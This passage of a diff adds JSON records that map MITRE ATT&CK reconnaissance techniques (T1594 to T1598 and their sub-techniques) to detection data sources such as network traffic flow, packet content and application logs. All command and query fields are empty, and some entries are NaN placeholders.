as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1598", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1597.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1597.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1597", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1596.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1596.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1596.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1596.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1596.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1596", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1595.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1595.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1595", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1594", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an 